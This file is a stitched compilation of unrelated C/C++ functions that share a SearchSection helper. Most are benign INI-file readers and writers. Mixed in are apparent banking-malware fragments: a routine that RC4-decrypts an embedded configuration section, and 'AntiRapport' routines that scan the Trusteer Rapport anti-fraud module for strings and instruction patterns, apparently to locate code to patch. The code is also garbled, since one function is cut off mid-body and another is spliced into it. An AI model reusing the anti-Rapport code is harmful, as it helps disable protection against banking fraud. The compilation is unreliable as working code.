BOOL GetSectionConfigData(PVOID pvPEBase,PVOID *ppvData,DWORD *pdwDataSize)
{
BOOL bRet = FALSE;
PIMAGE_SECTION_HEADER pvSection;
if (pvSection = SearchSection(pvPEBase,SECTION_CONFIG_NAME))
{
PSECTION_CONFIG_HEADER pSecCfgHeader = MAKE_PTR(pvPEBase,pvSection->VirtualAddress,PSECTION_CONFIG_HEADER);
PVOID pvDecryptedData;
if (pvDecryptedData = malloc(pSecCfgHeader->dwCompressedSize))
{
EncryptRc4(pSecCfgHeader->bRc4Key,sizeof(pSecCfgHeader->bRc4Key),pvDecryptedData,&pSecCfgHeader[1],pSecCfgHeader->dwCompressedSize);
if (bRet = DecompressBuffer(pvDecryptedData,pSecCfgHeader->dwCompressedSize,ppvData,pSecCfgHeader->dwDecompressedSize))
{
*pdwDataSize = pSecCfgHeader->dwDecompressedSize;
}
free(pvDecryptedData);
}
}
return bRet;
}
DWORD AntiRapportFindStr(HMODULE hRapportModule,LPCSTR lpFound,DWORD dwFoundLen)
{
DWORD dwResult = 0;
PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hRapportModule);
if (pHeaders)
{
PIMAGE_SECTION_HEADER pRData = SearchSection(pHeaders,".rdata");
if (pRData)
{
PUCHAR pAddr = (PUCHAR)((DWORD)hRapportModule + pRData->VirtualAddress);
for (DWORD i = 0; i < pRData->SizeOfRawData - dwFoundLen - 1; i++)
{
LPCSTR lpStr = (LPCSTR)(pAddr + i);
if (!m_memcmp(lpStr,lpFound,dwFoundLen + 1))
{
dwResult = (DWORD)lpStr;
break;
}
}
}
}
return dwResult;
}
float TFastIni::ReadFloat(AnsiString Section, AnsiString Key, float Default)
{
TFastIniSection *FIS = SearchSection(Section);
if (FIS){
return FIS->ReadFloat(Key, Default);
}else{
return Default;
}
}
bool TFastIni::ReadBool(AnsiString Section, AnsiString Key, int Default)
{
TFastIniSection *FIS = SearchSection(Section);
if (FIS){
return FIS->ReadInteger(Key, Default);
}else{
return Default;
}
}
AnsiString TFastIni::ReadString(AnsiString Section, AnsiString Key, AnsiString Default)
{
TFastIniSection *FIS = SearchSection(Section);
if (FIS){
return FIS->ReadString(Key, Default);
}else{
return Default;
}
}
BOOL TInifile::DelSection(const char *section)
{
TIniSection *sec = SearchSection(section);
if (!sec) return FALSE;
DelObj(sec);
delete sec;
if (sec == cur_sec) cur_sec = NULL;
return TRUE;
}
BOOL GetSectionConfigData(PVOID pvPEBase,PVOID *ppvData,DWORD *pdwDataSize)
{
BOOL bRet = FALSE;
PIMAGE_SECTION_HEADER pvSection;
if (pvSection = SearchSection(pvPEBase,SECTION_CONFIG_NAME))
{
char* data = MAKE_PTR(pvPEBase,pvSection->VirtualAddress,char*);
*ppvData = (void*)data;
*pdwDataSize = *((int*)data) + sizeof(int);
bRet = TRUE;
}
void TFastIni::ReadSectionValues(AnsiString Section, TStrings *S)
{
S->Clear();
TFastIniSection *FIS = SearchSection(Section);
if (FIS){
for (int i = 0 ; i < FIS->m_KeyValues->Count ; i++){
S->Add(FIS->m_KeyValues->Strings[i]);
}
}else{
return;
}
}
void TInifile::SetSection(const char *section)
{
if (cur_sec && cur_sec != root_sec && !cur_sec->TopObj()) {
DelObj(cur_sec);
delete cur_sec;
}
if ((cur_sec = SearchSection(section)) == NULL) {
cur_sec = new TIniSection();
cur_sec->Set(section);
AddObj(cur_sec);
}
}
void
GetPrivateProfileString (const char *section, const char *var,
const char *def, char *get, int length,
const char *filename)
{
char *buf;
char *section_found;
char *key_found;
memset (get, 0, length);
if (!filename)
{
strncpy (get, def, length);
return;
}
buf = file2buf (filename);
if (buf)
{
section_found = SearchSection (buf, section);
if (section_found)
{
key_found = SearchKey (section_found, var);
if (key_found)
{
char *val_start;
char *val_end;
val_start = strchr (key_found, '=') + 1;
val_end = val_start;
while ((*val_end != '\0') && (*val_end != '\n')
&& (*val_end != '\r'))
val_end++;
strncpy (get, val_start, val_end - val_start);
get[val_end - val_start] = '\0';
return;
}
}
}
strncpy (get, def, length);
}
PVOID AnitRapportFindPushStrs(HMODULE hRapportModule,DWORD dwStr1,DWORD dwStr2,PVOID *pvLogFix)
{
PVOID pvResult = 0;
PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS) pRtlImageNtHeader(hRapportModule);
if (pHeaders)
{
PIMAGE_SECTION_HEADER pRData = SearchSection(pHeaders,".text");
if (pRData)
{
PUCHAR pAddr = (PUCHAR)((DWORD)hRapportModule + pRData->VirtualAddress);
DWORD dwSize;
for (DWORD i = 0; i < pRData->SizeOfRawData - 8; i++, pAddr++)
{
if (*(DWORD*)pAddr == dwStr1)
{
GetInstLenght((PDWORD)(pAddr - 1),&dwSize);
if (dwSize == 5)
{
if (*(DWORD*)(pAddr + 5) == dwStr2)
{
GetInstLenght((PDWORD)(pAddr + 4),&dwSize);
if (dwSize == 5)
{
pvResult = (PVOID)(pAddr - 7);
*pvLogFix = (PVOID)(*(DWORD*)((DWORD)pAddr + 12) + (DWORD)(pAddr + 11) + 5);
break;
}
}
}
}
}
}
}
return pvResult;
}
void
WritePrivateProfileString (const char *section, const char *var,
const char *var_name, const char *filename)
{
FILE *file;
struct stat sb;
int res;
res = stat (filename, &sb);
if (-1 == res) // fichier n'existe pas
{
file = fopen (filename, "w");
InsertSectionKey (section, var, var_name, file, 0);
fclose (file);
}
else
{
int filesize;
filesize = sb.st_size - 1; // on ne lit pas EOT
if (filesize >= 0)
{
char *buf;
char *section_begin;
int size1, size2;
buf = file2buf (filename);
section_begin = SearchSection (buf, section);
if (NULL != section_begin) //section existe déjà
{
char *key_begin;
key_begin = SearchKey (section_begin, var);
if (NULL != key_begin) // la clé existe : on copie la partie d'avant l'ancienne clé, la nouvelle clé, puis la partie d'après l'ancienne clé
{
int old_key_size;
char *key_end;
size1 = key_begin - buf;
key_end = strstr (key_begin, "\n");
if (NULL != key_end)
{
old_key_size = key_end - key_begin + 1;
size2 = filesize - (size1 + old_key_size);
file = fopen (filename, "w");
fwrite (buf, size1, 1, file);
WriteKey (var, var_name, file);
fwrite (buf + size1 + old_key_size, size2, 1, file);
fclose (file);
}
else
{ // la clé est la dernière du fichier
file = fopen (filename, "w");
fwrite (buf, size1, 1, file);
WriteKey (var, var_name, file);
fclose (file);
}
}
else
{ // clé n'existe pas : on la rajoute avant la prochaine section
char *next_section_begin;
next_section_begin = strstr (section_begin, "*");
if (NULL == next_section_begin) // la section recherchée est unique : il suffit de copier la clé à la fin du fichier
{
file = fopen (filename, "a");
WriteKey (var, var_name, file);
fclose (file);
}
else
{ // on insère la clé avant la prochaine section
size1 = next_section_begin - buf;
size2 = filesize - size1;
file = fopen (filename, "w");
fwrite (buf, size1, 1, file);
WriteKey (var, var_name, file);
fwrite (buf + size1, size2, 1, file);
fclose (file);
}
}
}
else
{ //section n'existe pas : on la rajoute ainsi que la clé
file = fopen (filename, "a");
InsertSectionKey (section, var, var_name, file, 1);
fclose (file);
}
free (buf);
}
else
{ //taille fichier < 0
file = fopen (filename, "w");
InsertSectionKey (section, var, var_name, file, 0);
fclose (file);
}
}
}